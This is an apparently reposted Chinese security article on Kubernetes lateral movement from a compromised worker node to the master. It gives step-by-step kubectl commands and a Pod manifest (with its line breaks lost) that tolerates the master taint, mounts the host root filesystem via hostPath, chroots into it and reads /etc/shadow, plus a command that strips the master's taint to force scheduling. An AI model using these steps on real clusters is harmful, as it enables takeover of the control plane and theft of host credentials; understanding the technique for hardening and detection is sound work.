文章前言
污点是K8s高级调度的特性,用于限制哪些Pod可以被调度到某一个节点,一般主节点包含一个污点,这个污点是阻止Pod调度到主节点上面,除非有Pod能容忍这个污点,而通常容忍这个污点的Pod都是系统级别的Pod,例如:kube-system
基本原理
攻击者在获取到node节点的权限后可以通过kubectl来创建一个能够容忍主节点的污点的Pod,当该Pod被成功创建到Master上之后,攻击者可以通过在子节点上操作该Pod实现对主节点的控制
横向移动
Step 1:Node中查看节点信息
kubectl get nodes
Step 2:确认Master节点的容忍度
#方式一kubectl describe nodes master
#方式二kubectl describe node master | grep \\\'Taints\\\' -A 5
Step 3:创建带有容忍参数的Pod(必要时可以修改Yaml使Pod增加到特定的Node上去)
apiVersion: v1kind: Podmetadata:name: control-master-15spec:tolerations:- key: node-role.kubernetes.io/masteroperator: Existseffect: NoSchedulecontainers:- name: control-master-15image: ubuntu:18.04command: [\\\"/bin/sleep\\\", \\\"3650d\\\"]volumeMounts:- name: mastermountPath: /mastervolumes:- name: masterhostPath:path: /type: Directory
#创建Podkubectl create -f control-master.yaml#部署情况kubectl get deploy -o wide#Pod详情kubectl get pod -o wide
Step 4:获得Master控制端
kubectl exec control-master-15 -it bashchroot /master bashls -alcat /etc/shadow
扩展技巧
执行以下命令清除污点之后直接执行部署Pod到Master上,之后通过挂载实现逃逸获取Master节点的权限
#清除污点kubectl taint nodes debian node-role.kubernetes.io/master:NoSchedule-#查看污点kubectl describe node master | grep \\\'Taints\\\' -A 5
原创文章,作者:七芒星实验室,如若转载,请注明出处:https://www.sudun.com/ask/34210.html
